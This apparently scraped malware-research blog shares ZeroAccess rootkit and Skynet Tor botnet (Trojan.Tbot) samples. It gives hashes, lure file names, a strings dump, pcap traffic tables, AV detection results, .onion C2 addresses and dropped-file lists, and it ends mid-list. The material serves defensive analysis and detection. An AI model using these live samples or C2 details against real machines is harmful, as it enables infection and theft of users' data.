botnet / Trojan.Tbot samples Previous * * * Merry Christmas and Happy New Year! * * * 0 0 Image may be NSFW. Clik here to view.Stocking stuffers. ZeroAccess rootkit is far from new and exciting but but this is a fresh lot with still active C2 servers. Although the dropper is detected by at least half of AV engines, post infection detection is another story. I tried Kaspersky TDSS Killer, Avast Rootkit utility and RootRepeal without any success. I used Gmer and LordPE to carve out the hidden file from the memory. You can use Redline or Volatility too. You can download 5 files below together with pcaps from one of the files and the file dumped from memory. It appears that free videos and apps names are used as the lure in this case. Download Image may be NSFW. Clik here to view.Download the 5 files below plus the file dumped from memory Download 2 pcap files from 2 runs of A2611095F689FADFFD3068E0D4E3E7ED File information * 251a2c7eff890c58a9d9eda5b1391082160 KB622.exe_ * 1a12137bd701bd9ed607671ce1b7806a160 KBanimal-sex-free.avi.exe_ * 59b247f0266b107451104243261a7ecf159 KBFlashPlayer_11_4_update_for_Win.exe_ * 98a993d62d367682048ec70df109e7d8161 KBreadme.exe_ * a2611095f689fadffd3068e0d4e3e7ed160 KBZeroAccess_xxx-porn-movie.avi.exe_ A2611095F689FADFFD3068E0D4E3E7ED Screenshots from A2611095F689FADFFD3068E0D4E3E7ED Download 2 pcap files from 2 runs of A2611095F689FADFFD3068E0D4E3E7ED hidden library - injected in Explorer.exe Image may be NSFW. Clik here to view. Image may be NSFW. Clik here to view. Strings from the dumped z binary File: dumped.dll MD5: fe756584b159fd24dc4b6a572917354c Size: 73728 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. RichK6 t#cP[LordPE] SPC3 .text `.rdata @.data RtlImageNtHeader RtlImageDirectoryEntryToData LdrProcessRelocationBlock ----------------------------------------------------snip------------------------------------------------------ RtlExitUserThread wcslen swprintf LdrGetProcedureAddress wcsrchr wcscpy wcscat ZwOpenFile RtlInitUnicodeString ZwReadFile ZwClose ZwWriteFile ZwOpenEvent ZwQueryVolumeInformationFile memcpy RtlAppendUnicodeToString RtlConvertSidToUnicodeString ZwOpenProcessToken ZwQueryInformationToken ZwCreateEvent LdrFindEntryForAddress ZwCreateEventPair ZwSetHighWaitLowEventPair ZwWaitHighEventPair ZwSetLowEventPair memset RtlInterlockedPushEntrySList RtlInterlockedPopEntrySList RtlNtStatusToDosError ZwCreateSection ZwMapViewOfSection ZwUnmapViewOfSection RtlTimeToSecondsSince1980 qsort ZwQueryEaFile ZwQueryDirectoryFile wcstoul ZwDeleteFile ZwCreateFile ZwSetEaFile ZwSetInformationFile RtlAddressInSectionTable RtlComputeCrc32 ntdll.dll VirtualAlloc LoadLibraryA EnterCriticalSection LeaveCriticalSection VirtualFree LoadLibraryW FreeLibrary Sleep SleepEx InitializeCriticalSection DeleteCriticalSection GetProcAddress DisableThreadLibraryCalls CreateThread CreateTimerQueueTimer DeleteTimerQueueTimer LocalAlloc LocalFree BindIoCompletionCallback GetLastError GetSystemTimeAsFileTime KERNEL32.dll MD5Init MD5Update MD5Final CryptAcquireContextW CryptImportKey CryptGenRandom CryptDestroyKey CryptReleaseContext CryptCreateHash CryptSetHashParam CryptVerifySignatureW CryptDestroyHash ADVAPI32.dll AcceptEx MSWSOCK.dll WSASocketW WSAIoctl WSARecv WSASend WSASendTo WSARecvFrom WS2_32.dll RtlUnwind NtQueryVirtualMemory t#cP p2p.32.dll DllGetClassObject @S0j @p0j @p0j T0j@ U0j@ 0*0k0 1&101B1J1[1b1p1v1 2#2(2?2H2g2y2 2H3Q3m3s3 41484`4r4x4 546;6B6]6b6n6 7&757;7U7h7q7 8+888=8H8M8X8]8j8p8 9#90969@9J9P9W9^9e9j9o9 9F:M:T:Z:b: ;%;2; =$=2=<=s= >q?{? 3*3s3~3R4m4z4 545Y5z5 6E6J6 6O7t7 9,9C9i9 9$:/:G:i: ;%;,;M;]; ;3<: data-blogger-escaped-i="i" data-blogger-escaped-j="j" data-blogger-escaped-z="z">q> ?.?>?P?^?p? 0(0:0F0W0h0 1#121R1 313R3Y3_3q3v3 4!4t4z4 5?5|5 9+9A9K9 ;,;R;[;t; <$<*<0 data-blogger-escaped-00080="00080" data-blogger-escaped-1.141="1.141" data-blogger-escaped-6="6" data-blogger-escaped-al="al" data-blogger-escaped-b="b" data-blogger-escaped-d0t0="d0t0" data-blogger-escaped-ddev="ddev" data-blogger-escaped-h="h" data-blogger-escaped-iy="iy" data-blogger-escaped-m="m" data-blogger-escaped-ur="ur">2i1FQ q'.C )5Rb !Q[#\ 5L@0 5e{u -~G5 iV:RE Scwn= /dq_ m|XK vT{! g]a%Ph Z,Jn gf[G:C0! >Ze\# b'fg (m9/ "0Gk_ @Vc}X J+[YR~m Ol"`o L*s~t6L (-w^ RdHQ is*X Lclu) [TRg" k#lhK& 2)\a N3?2t-% }vX} =0^FBO Jfjo hNHWF Eub! %h:A Zn=p #`N$ %JQ3 CVy\ n_"/? AYQD _pB0 @-S WQ<6 data-blogger-escaped-3cbi="3cbi" data-blogger-escaped-fdrtg="fdrtg" data-blogger-escaped-gj="gj" data-blogger-escaped-vb="e" data-blogger-escaped-y="y"> Kz!81 )v L X-vy YgB\ \Y82aM" ==.yf 2z"-{ ^guA ,~qw) 7z2F -IR4j;z1| >!Nh OZWG s&h!\ rKhi/ iVrOhi 7']lM K64} ivYi |fpK Jd$< 9CX? .t'TR O6qa |-De mTB` \BL\* m`Wo mB"XpH 2C|d X\,j /"JE VW>b gP,.- %m|SXG aOBY A`3"kr9 D dRIT PgBeb ~pi2C USER32.dll CreateWindowExW InvalidateRgn PostMessageW UpdateWindow SetTimer IsIconic GetSystemMetrics GetClientRect DrawIcon EnableWindow PostQuitMessage SetWindowPos MapDialogRect KERNEL32.dll GetVersionExW SetUnhandledExceptionFilter QueryPerformanceCounter GetSystemTimeAsFileTime GetModuleHandleW FreeEnvironmentStringsA GetEnvironmentStrings FreeEnvironmentStringsW GetEnvironmentStringsW GetCommandLineA SetHandleCount GetStdHandle GetFileType GetStartupInfoA HeapDestroy HeapCreate VirtualFree GetModuleFileNameA TerminateProcess UnhandledExceptionFilter GetACP GetOEMCP GetCPInfo IsValidCodePage HeapReAlloc GetTimeZoneInformation DebugBreak OutputDebugStringA WriteConsoleW OutputDebugStringW LCMapStringA LCMapStringW GetStringTypeA OLEAUT32.dll OleLoadPicture DispGetIDsOfNames SafeArrayAllocDescriptor GetErrorInfo SetErrorInfo VariantClear OleLoadPictureEx ADVAPI32 RegQueryInfoKeyA RegSetValueExA RegOpenKeyExA RegCreateKeyExA RegCloseKey RegDeleteValueA RegDeleteKeyA RegEnumKeyExA SHLWAPI.dll PathFindExtensionA WIS_EX O3b3~3 3;4$6 ;9=~=)? 4>5L7 =6>S?s? 9.:q: 414S4 7H7j7 6?:l; Unicode Strings: --------------------------------------------------------------------------- \BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D79} \BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D77} \BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D78} %sU\%08x.@ S-1-5-18 \??\%sU \??\%s@ \BaseNamedObjects\Restricted\{0C5AB9CD-2F90-6754-8374-21D4DAB28CC1} shell32.dll wbem\fastprox.dll \systemroot RECYCLER\ $Recycle.Bin\ \$%08x%04x%04x%02x%02x%02x%02x%02x%02x%02x%02x\ c:\windows\system32\z ????????.@ %08x.@ %08x.$ %08x.~ Microsoft Base Cryptographic Provider v1.0 Traffic | <- data-blogger-escaped--="-"> | | Total | | Frames Bytes | | Frames Bytes | | Frames Bytes | 172.16.253.130 <-> 81.17.26.187 50 46654 31 3711 81 50365 172.16.253.130 <-> 67.81.86.2 41 38700 30 1696 71 40396 172.16.253.255 <-> 172.16.253.1 57 10592 0 0 57 10592 172.16.253.130 <-> 50.22.196.70 8 1880 10 696 18 2576 194.165.17.3 <-> 172.16.253.130 10 620 0 0 10 620 172.16.253.130 <-> 66.85.130.234 0 0 9 558 9 558 172.16.253.130 <-> 8.8.8.8 4 463 4 296 8 759 224.0.0.22 <-> 172.16.253.130 7 378 0 0 7 378 217.16.132.181 <-> 172.16.253.130 3 174 3 1830 6 2004 172.16.253.130 <-> 24.177.187.254 2 1220 2 116 4 1336 172.16.253.130 <-> 90.230.66.250 2 1220 2 116 4 1336 172.16.253.130 <-> 68.3.172.252 2 1220 2 116 4 1336 172.16.253.130 <-> 68.39.227.12 2 1220 2 116 4 1336 172.16.253.130 <-> 98.192.218.116 2 1220 2 116 4 1336 172.16.253.130 <-> 85.137.174.6 2 1220 2 116 4 1336 201.211.32.247 <-> 172.16.253.130 2 116 2 1220 4 1336 211.7.72.252 <-> 172.16.253.130 1 58 3 1830 4 1888 172.16.253.130 <-> 71.205.240.248 2 1220 2 116 4 1336 222.147.143.23 <-> 172.16.253.130 2 116 2 1220 4 1336 172.16.253.130 <-> 66.31.49.90 2 1220 2 116 4 1336 180.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232 184.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232 190.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232 201.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232 212.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232 213.253.253.254 <-> 172.16.253.130 4 232 0 0 4 232 172.16.253.130 <-> 71.254.253.254 0 0 4 232 4 232 172.16.253.130 <-> 87.254.253.254 0 0 4 232 4 232 172.16.253.130 <-> 88.254.253.254 0 0 4 232 4 232 172.16.253.130 <-> 115.254.253.254 0 0 4 232 4 232 172.16.253.130 <-> 135.254.253.254 0 0 4 232 4 232 180.254.253.254 <-> 172.16.253.130 4 232 0 0 4 232 190.254.253.254 <-> 172.16.253.130 4 232 0 0 4 232 172.16.253.130 <-> 122.108.42.3 2 1220 1 58 3 1278 172.16.253.130 <-> 77.38.241.250 2 1220 1 58 3 1278 172.16.253.130 <-> 24.192.219.246 0 0 3 174 3 174 187.24.70.8 <-> 172.16.253.130 1 58 2 660 3 718 172.16.253.130 <-> 24.62.58.244 1 610 2 116 3 726 239.255.255.250 <-> 172.16.253.130 3 525 0 0 3 525 173.217.207.244 <-> 172.16.253.130 1 58 1 610 2 668 187.37.221.247 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 77.239.75.251 1 190 1 58 2 248 174.6.201.58 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 96.37.24.59 1 610 1 58 2 668 172.16.253.130 <-> 74.134.198.91 1 610 1 58 2 668 217.122.27.18 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 67.249.162.249 1 610 1 58 2 668 172.16.253.130 <-> 149.169.251.240 1 610 1 58 2 668 172.16.253.130 <-> 79.119.48.248 1 610 1 58 2 668 213.238.99.54 <-> 172.16.253.130 1 58 1 610 2 668 190.18.75.10 <-> 172.16.253.130 1 58 1 610 2 668 174.5.212.39 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 72.185.161.253 1 610 1 58 2 668 172.16.253.130 <-> 76.10.148.252 1 610 1 58 2 668 172.16.253.130 <-> 121.88.136.25 1 610 1 58 2 668 190.188.23.234 <-> 172.16.253.130 1 58 1 610 2 668 181.46.99.30 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 24.251.155.31 1 610 1 58 2 668 216.212.30.6 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 68.227.164.2 1 610 1 58 2 668 221.31.86.14 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 50.89.229.3 1 610 1 58 2 668 172.16.253.130 <-> 24.8.220.1 1 610 1 58 2 668 172.16.253.130 <-> 76.85.130.1 1 610 1 58 2 668 201.242.155.52 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 68.97.69.21 1 610 1 58 2 668 172.16.253.130 <-> 78.210.148.146 1 610 1 58 2 668 172.16.253.130 <-> 132.239.127.98 1 610 1 58 2 668 172.16.253.130 <-> 74.197.22.12 1 610 1 58 2 668 172.16.253.130 <-> 71.86.90.31 1 610 1 58 2 668 172.16.253.130 <-> 82.130.176.36 1 610 1 58 2 668 172.16.253.130 <-> 71.75.94.251 1 610 1 58 2 668 184.63.10.2 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 68.198.104.16 1 610 1 58 2 668 172.16.253.130 <-> 68.63.59.19 1 610 1 58 2 668 172.16.253.130 <-> 72.208.52.19 1 610 1 58 2 668 172.16.253.130 <-> 74.88.223.17 1 610 1 58 2 668 172.16.253.130 <-> 74.78.96.3 1 610 1 58 2 668 172.16.253.130 <-> 62.83.76.8 1 610 1 58 2 668 172.16.253.130 <-> 24.189.56.15 1 610 1 58 2 668 172.16.253.130 <-> 72.9.76.230 1 610 1 58 2 668 172.16.253.130 <-> 37.61.145.4 1 610 1 58 2 668 172.16.253.130 <-> 114.42.77.245 1 610 1 58 2 668 186.95.53.23 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 98.244.14.31 1 610 1 58 2 668 172.16.253.130 <-> 50.138.151.250 1 610 1 58 2 668 172.16.253.130 <-> 83.166.29.245 1 610 1 58 2 668 172.16.253.130 <-> 97.82.141.252 1 610 1 58 2 668 172.16.253.130 <-> 74.210.227.231 1 610 1 58 2 668 190.183.66.239 <-> 172.16.253.130 2 116 0 0 2 116 172.16.253.130 <-> 83.155.101.250 1 610 1 58 2 668 172.16.253.130 <-> 67.171.167.239 1 610 1 58 2 668 172.16.253.130 <-> 98.226.151.245 1 610 1 58 2 668 172.16.253.130 <-> 78.136.84.249 1 610 1 58 2 668 187.11.74.251 <-> 172.16.253.130 1 58 1 330 2 388 172.16.253.130 <-> 98.15.165.19 1 610 1 58 2 668 172.16.253.130 <-> 83.250.104.244 1 610 1 58 2 668 172.16.253.130 <-> 66.25.254.251 1 610 1 58 2 668 172.16.253.130 <-> 75.108.175.6 1 610 1 58 2 668 200.83.116.254 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 67.86.22.250 1 610 1 58 2 668 172.16.253.130 <-> 85.219.65.249 1 610 1 58 2 668 172.16.253.130 <-> 93.129.51.17 1 610 1 58 2 668 172.16.253.130 <-> 50.82.72.7 1 610 1 58 2 668 172.16.253.130 <-> 84.22.46.10 1 610 1 58 2 668 172.16.253.130 <-> 68.3.136.248 1 610 1 58 2 668 172.16.253.130 <-> 42.2.8.26 1 610 1 58 2 668 172.16.253.130 <-> 74.50.161.16 1 610 1 58 2 668 172.16.253.130 <-> 92.36.232.253 1 610 1 58 2 668 172.16.253.130 <-> 67.242.141.7 1 610 1 58 2 668 172.16.253.130 <-> 68.97.192.245 1 610 1 58 2 668 172.16.253.130 <-> 76.179.132.243 1 610 1 58 2 668 172.16.253.130 <-> 109.91.69.10 1 610 1 58 2 668 172.16.253.130 <-> 72.228.143.4 1 610 1 58 2 668 172.16.253.130 <-> 24.122.95.248 1 610 1 58 2 668 172.16.253.130 <-> 71.230.164.254 1 610 1 58 2 668 172.16.253.130 <-> 88.156.158.252 1 610 1 58 2 668 184.155.119.6 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 92.245.80.12 1 610 1 58 2 668 172.16.253.130 <-> 75.74.147.252 1 610 1 58 2 668 172.16.253.130 <-> 75.178.72.213 1 610 1 58 2 668 172.16.253.130 <-> 24.50.88.235 1 610 1 58 2 668 172.16.253.130 <-> 68.200.221.136 1 610 1 58 2 668 201.82.178.48 <-> 172.16.253.130 1 58 1 610 2 668 201.213.33.102 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 68.230.14.194 1 610 1 58 2 668 172.16.253.130 <-> 66.75.24.66 1 610 1 58 2 668 172.16.253.130 <-> 50.149.21.3 1 610 1 58 2 668 172.16.253.130 <-> 69.244.161.47 1 610 1 58 2 668 172.16.253.130 <-> 68.50.37.55 1 610 1 58 2 668 172.16.253.130 <-> 75.109.4.31 1 610 1 58 2 668 217.29.105.122 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 71.142.137.30 1 610 1 58 2 668 189.47.43.134 <-> 172.16.253.130 1 58 1 610 2 668 172.16.253.130 <-> 96.54.179.14 1 610 1 58 2 668 172.16.253.130 <-> 65.55.21.20 1 90 1 90 2 180 172.16.253.254 <-> 172.16.253.130 0 0 2 684 2 684 255.255.255.255 <-> 0.0.0.0 2 697 0 0 2 697 209.33.87.124 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 66.67.35.253 0 0 1 58 1 58 172.16.253.130 <-> 66.103.121.14 0 0 1 58 1 58 172.16.253.130 <-> 76.209.55.86 0 0 1 58 1 58 181.164.33.60 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 75.72.214.254 0 0 1 58 1 58 172.16.253.130 <-> 95.234.193.232 0 0 1 58 1 58 209.188.69.239 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 114.42.103.2 0 0 1 58 1 58 172.16.253.130 <-> 69.113.243.26 0 0 1 58 1 58 172.16.253.130 <-> 46.42.233.237 0 0 1 58 1 58 172.16.253.130 <-> 170.51.113.2 0 0 1 58 1 58 172.16.253.130 <-> 65.181.33.2 0 0 1 58 1 58 172.16.253.130 <-> 31.147.118.11 0 0 1 58 1 58 189.100.56.246 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 80.198.94.247 0 0 1 58 1 58 172.16.253.130 <-> 41.200.172.238 0 0 1 58 1 58 172.16.253.130 <-> 42.72.147.237 0 0 1 58 1 58 184.41.210.243 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 108.35.221.6 0 0 1 58 1 58 172.16.253.130 <-> 96.20.100.20 0 0 1 58 1 58 172.16.253.130 <-> 93.114.195.25 0 0 1 58 1 58 189.68.39.1 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 92.86.70.249 0 0 1 58 1 58 190.108.27.11 <-> 172.16.253.130 1 58 0 0 1 58 184.6.88.20 <-> 172.16.253.130 1 58 0 0 1 58 205.204.22.110 <-> 172.16.253.130 1 58 0 0 1 58 172.16.253.130 <-> 24.247.237.237 0 0 1 58 1 58 172.16.253.130 <-> 76.20.50.19 0 0 1 58 1 58 172.16.253.130 <-> 91.242.217.247 0 0 1 62 1 62 172.16.253.130 <-> 4.2.2.2 0 0 1 76 1 76 ========================================================= Automatic scans https://www.virustotal.com/file/984fb2e07de82bc4a228c715dd0790e45dc1d104f6a9b082da9a4cecc0e151b7/analysis/ SHA256:984fb2e07de82bc4a228c715dd0790e45dc1d104f6a9b082da9a4cecc0e151b7 SHA1:5842f0d4fe3f177f2bb06a2e5878da55f7d814c7 MD5:251a2c7eff890c58a9d9eda5b1391082 File size:160.5 KB ( 164352 bytes ) File name:vti-rescan File type:Win32 EXE Tags:peexe Detection ratio:14 / 46 Analysis date: 2012-12-26 05:35:35 UTC ( 1 hour, 12 minutes ago ) AntiVirTR/Kazy.13106020121225 AvastWin32:ZAccess-NF [Trj]20121226 BitDefenderTrojan.Generic.KDZ.271420121226 DrWebTrojan.DownLoader7.4534220121226 ESET-NOD32a variant of Win32/Kryptik.AREI20121225 F-SecureTrojan.Generic.KDZ.271420121225 FortinetW32/Kryptik.ARCN!tr20121226 GDataTrojan.Generic.KDZ.271420121226 KasperskyBackdoor.Win32.ZAccess.apvo20121226 KingsoftWin32.Hack.ZAccess.ap.(kcloud)20121225 MalwarebytesRootkit.0Access20121226 MicrosoftTrojan:Win32/Sirefef.P20121226 TrendMicro-HouseCallTROJ_GEN.R47H1LP20121225 ViRobotBackdoor.Win32.A.ZAccess.164352.E20121226 https://www.virustotal.com/file/d9dfcc507d773bf76075eed8abbb61e54f03f5f920b5c348fd7a0bf5f7bab3dd/analysis/ SHA256:d9dfcc507d773bf76075eed8abbb61e54f03f5f920b5c348fd7a0bf5f7bab3dd SHA1:56104a626101126eed10e65171a26e25b6e50712 MD5:1a12137bd701bd9ed607671ce1b7806a File size:160.5 KB ( 164352 bytes ) File name:amateur_dog_sex_01.avi.exe File type:Win32 EXE Tags:peexe Detection ratio:6 / 46 Analysis date: 2012-12-25 10:50:38 UTC ( 19 hours, 59 minutes ago ) BitDefenderGen:Variant.Kazy.13106020121225 F-SecureGen:Variant.Kazy.13106020121225 KasperskyBackdoor.Win32.ZAccess.apvo20121225 MalwarebytesRootkit.0Access20121225 TrendMicro-HouseCallTROJ_GEN.F47V122520121225 https://www.virustotal.com/file/13586ffeca632e34c5813dcce4729b20852db0c9fb3ae0b6319699c739f5be29/analysis/ SHA256:13586ffeca632e34c5813dcce4729b20852db0c9fb3ae0b6319699c739f5be29 SHA1:865cf7a7ff3dde0828e7764751d76c8df6291506 MD5:59b247f0266b107451104243261a7ecf File size:159.5 KB ( 163328 bytes ) File name:animal-xxx-movie.avi.exe File type:Win32 EXE Tags:peexe Detection ratio:13 / 46 Analysis date: 2012-12-25 19:00:57 UTC ( 11 hours, 50 minutes ago ) AhnLab-V3Backdoor/Win32.ZAccess20121225 AvastWin32:ZAccess-NF [Trj]20121226 BitDefenderTrojan.Generic.KD.81713820121225 DrWebTrojan.DownLoader7.4543720121226 ESET-NOD32a variant of Win32/Kryptik.AREI20121225 F-SecureTrojan.Generic.KD.81713820121225 FortinetW32/Kryptik.ARCN!tr20121225 GDataTrojan.Generic.KD.81713820121225 KasperskyBackdoor.Win32.ZAccess.apzt20121225 MalwarebytesRootkit.0Access20121225 McAfee-GW-Edition-20121225 MicrosoftTrojan:Win32/Meredrop20121226 MicroWorld-eScanTrojan.Generic.KD.81713820121225 TrendMicro-HouseCallTROJ_GEN.F47V122520121225 https://www.virustotal.com/file/ac263c2267892fc9995ad841fc649e2071f8626dcc0d2d27cbce4ab6cb54f4ca/analysis/ SHA256:ac263c2267892fc9995ad841fc649e2071f8626dcc0d2d27cbce4ab6cb54f4ca SHA1:33395e02036526ef7c3ab05afb137c7af2bcd6df MD5:98a993d62d367682048ec70df109e7d8 File size:161.0 KB ( 164864 bytes ) File name:vti-rescan File type:Win32 EXE Tags:peexe Detection ratio:20 / 46 Analysis date: 2012-12-26 05:39:43 UTC ( 1 hour, 12 minutes ago ) AhnLab-V3Backdoor/Win32.ZAccess20121225 AntiVirTR/Rogue.kdz.2666.120121225 AvastWin32:ZAccess-NE [Trj]20121226 AVGBackDoor.Generic16.ZLB20121225 BitDefenderTrojan.Generic.KDZ.266620121226 ComodoUnclassifiedMalware20121226 DrWebTrojan.DownLoader7.4511020121226 ESET-NOD32a variant of Win32/Kryptik.AREI20121225 F-SecureTrojan.Generic.KDZ.266620121225 FortinetW32/ZAccess.APQP!tr.bdr20121226 GDataTrojan.Generic.KDZ.266620121226 KasperskyBackdoor.Win32.ZAccess.apqp20121226 KingsoftWin32.Malware.Generic.a.(kcloud)20121225 MalwarebytesRootkit.0Access20121226 McAfee-GW-Edition-20121226 MicrosoftTrojan:Win32/Sirefef.P20121226 nProtectTrojan.Generic.KDZ.266620121225 PandaSuspicious file20121225 TrendMicro-HouseCallTROJ_GEN.R47H1LP20121225 VIPRETrojan.Win32.Generic!BT20121226 ViRobotBackdoor.Win32.A.ZAccess.164864.L20121226 https://www.virustotal.com/file/71b38f041b4a4ae169c44e3aff412e527e1156f92c27f1340a8abe70a45bee10/analysis/ SHA256:71b38f041b4a4ae169c44e3aff412e527e1156f92c27f1340a8abe70a45bee10 SHA1:6d21fc25b9da49d746b2b7609a5efaed4d332e6a MD5:a2611095f689fadffd3068e0d4e3e7ed File size:160.0 KB ( 163840 bytes ) File name:amateur_dog_sex_01.avi.exe File type:Win32 EXE Tags:peexe Detection ratio:14 / 45 Analysis date: 2012-12-26 00:19:54 UTC ( 6 hours, 35 minutes ago ) AvastWin32:ZAccess-NF [Trj]20121226 BitDefenderTrojan.Generic.KD.81721720121226 ComodoTrojWare.Win32.Trojan.Agent.Gen20121226 DrWebTrojan.DownLoader7.4552720121226 EmsisoftBackdoor.Win32.ZAccess (A)20121226 FortinetW32/Kryptik.ARCN!tr20121226 GDataTrojan.Generic.KD.81721720121226 IkarusBackdoor.Win32.ZAccess20121226 KasperskyBackdoor.Win32.ZAccess.aqep20121226 KingsoftWin32.Malware.Generic.a.(kcloud)20121225 MalwarebytesRootkit.0Access20121226 McAfee-GW-Edition-20121226 MicroWorld-eScanTrojan.Generic.KD.81721720121226 SUPERAntiSpyware-20121224 SymantecWS.Reputation.120121226 TrendMicro-HouseCallTROJ_GEN.RFFH1LQ20121226 DEC. 2012 SKYNET TOR BOTNET / TROJAN.TBOT SAMPLES December 26, 2012, 10:39 pm Next Dec 2012 Batchwiper Samples Previous ZeroAccess / Sirefef Rootkit - 5 fresh samples 0 0 Image may be NSFW. Clik here to view. Here are 7 binaries for Skynet Tor botnet aka Trojan.Tbot. Claudio's analysis is wonderfully detailed, I just added pcaps and a few words in the description Read more here: Rapid7. Claudio Guarnieri. Skynet, a Tor-powered botnet straight from Reddit Files 2E1814CCCF0C3BB2CC32E0A0671C0891 17.1 MB Coldplay-Live_2012-2012-BriBerY.exe_ 5375fb5e867680ffb8e72d29db9abbd5 15 MB FileMaker_Server_Advanced_v12.0.1_MULTiLANGUAGE-CYGiSO.exe_ A0552D1BC1A4897141CFA56F75C04857 10 MB SpeedCommander.v14.40.Incl.Keygen-MESMERiZE.exe_ 191B26BAFDF58397088C88A1B3BAC5A6 14.9 MB tor.exe_ 519ED597B22D46EF8029C0720206E9D5 14.8 MB UEStudio.v12.20.0.1002.Incl.Keygen-MESMERiZE.exe_ 23AAB9C1C462F3FDFDDD98181E963230 14.9 MB ysahu.ex_ fc7c3e087789824f34a9309da2388ce5 11.3 MB Z.wie.Zorro.S01E03.Der.Brandstifter.GERMAN.ANiME.FS.DVDRip.XViD-aWake.exe_ The files are very large but contain no video or other entertainment material, just are padded with zeros. Download Image may be NSFW. Clik here to view. Download all 7 files above Email me if you need the password Download all the created / dropped files for 2E1814CCCF0C3BB2CC32E0A0671C0891 available pcaps -- Download (no password) 4.08 MBtbot_2E1814CCCF0C3BB2CC32E0A0671C0891.pcap 3.24 MBtbot_23AAB9C1C462F3FDFDDD98181E963230.pcap 7.55 MBtbot_191B26BAFDF58397088C88A1B3BAC5A6.pcap 5.19 MBtbot_5375FB5E867680FFB8E72D29DB9ABBD5.pcap 3.97 MBtbot_A0552D1BC1A4897141CFA56F75C04857.pcap 7.43 MBtbot_FC7C3E087789824F34A9309DA2388CE5.pcap File description Domains for each sample 191B26BAFDF58397088C88A1B3BAC5A6 4kijo4rr4b6p6uv5.onion 23AAB9C1C462F3FDFDDD98181E963230 jtjoxo3uo3mh35kw.onion 2E1814CCCF0C3BB2CC32E0A0671C0891 c24dsyw5qwcbohtv.onion 519ED597B22D46EF8029C0720206E9D5 465z2el27gv4ls74.onion 5375FB5E867680FFB8E72D29DB9ABBD5 jnc6zswe3w6siqn2.onion A0552D1BC1A4897141CFA56F75C04857 blm6o2rzv4ucdq4m.onion FC7C3E087789824F34A9309DA2388CE5 enklhhn44mk2s6rc.onion Active Connections Proto Local Address Foreign Address State PID TCP 127.0.0.1:2064 127.0.0.1:2065 ESTABLISHED 2376 [IEXPLORE.EXE] TCP 127.0.0.1:2065 127.0.0.1:2064 ESTABLISHED 2376 [IEXPLORE.EXE] TCP 127.0.0.1:2069 127.0.0.1:9050 ESTABLISHED 2860 [IEXPLORE.EXE] TCP 127.0.0.1:9050 127.0.0.1:2069 ESTABLISHED 2376 [IEXPLORE.EXE] TCP 172.16.253.130:2100 204.45.139.123:443 ESTABLISHED 2376 [IEXPLORE.EXE] TCP 172.16.253.130:2103 82.96.35.6:443 ESTABLISHED 2376 [IEXPLORE.EXE] TCP 172.16.253.130:2104 109.105.109.163:44945 ESTABLISHED 2376 [IEXPLORE.EXE] TCP 127.0.0.1:2147 127.0.0.1:42349 CLOSE_WAIT 1592 [Explorer.EXE] File changes Red - << old, classic, pre-Citadel Zeus Blue - << tbot %USERPROFILE%\Application Data\Microsoft\Address Book\Laura.wab %USERPROFILE%\Application Data\Microsoft\Address Book\Laura.wab~ %USERPROFILE%\Application Data\Kynir\tonob.exe < copy of the original dropper %USERPROFILE%\Application Data\tor\cached-certs %USERPROFILE%\Application Data\tor\cached-consensus %USERPROFILE%\Application Data\tor\cached-descriptors %USERPROFILE%\Application Data\tor\cached-descriptors.new %USERPROFILE%\Application Data\tor\hidden_service\hostname %USERPROFILE%\Application Data\tor\hidden_service\private_key %USERPROFILE%\Application Data\tor\lock %USERPROFILE%\Application Data\tor\state %USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Folders.dbx %USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Inbox.dbx %USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Offline.dbx %USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Sent Items.dbx %USERPROFILE%\Local Settings\Temp\OpenCL.dll %USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\test[1].txt %USERPROFILE%\Application Data\Egoffi\poofd.tmp deleted_files %USERPROFILE%\Application Data\tor\cached-descriptors %USERPROFILE%\Application Data\tor\cached-descriptors.new %USERPROFILE%\Application Data\tor\hidden_service\hostname %USERPROFILE%\Application Data\tor\state %USERPROFILE%\Application Data\tor\unverified-consensus %USERPROFILE%\Cookies\laura@accounts.google[2].txt (plus all other cookies) %USERPROFILE%\Local Settings\Temp\MPS9.tmp %USERPROFILE%\Local Settings\Temp\tmp1c031ecd.bat %USERPROFILE%\Local 